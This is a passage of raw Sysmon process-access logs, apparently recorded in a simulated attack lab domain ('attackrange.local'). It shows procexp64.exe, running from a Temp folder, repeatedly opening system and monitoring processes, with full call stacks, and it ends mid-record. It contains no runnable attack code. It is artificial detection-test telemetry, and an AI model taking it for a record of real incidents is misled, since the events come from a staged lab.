procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791104Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791103Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791102Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791101Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791100Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791099Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791098Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791097Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791096Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791095Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791094Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791093Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791092Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791091Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791090Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791089Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791088Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791087Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 